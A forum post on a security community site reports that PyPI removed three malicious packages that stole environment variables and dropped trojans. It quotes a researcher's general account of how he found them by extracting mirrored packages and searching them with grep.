Malicious PyPI packages with over 10,000 downloads taken down

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,057
The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines.

These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers' report.

This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.
"Once I had a large number of the package distributions downloaded, I needed to extract them for easier analysis. I put together a pretty simple Python script to recursively iterate through Bandersnatch’s somewhat complicated folder structure then decompressed and extracted each sdist, egg, or wheel out to a flat directory," explains the developer in his blog post.

"Once extracted I ran a number of string and regex searches using grep, then manually reviewed the results. The outcome of this simple approach was actually pretty impactful."
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top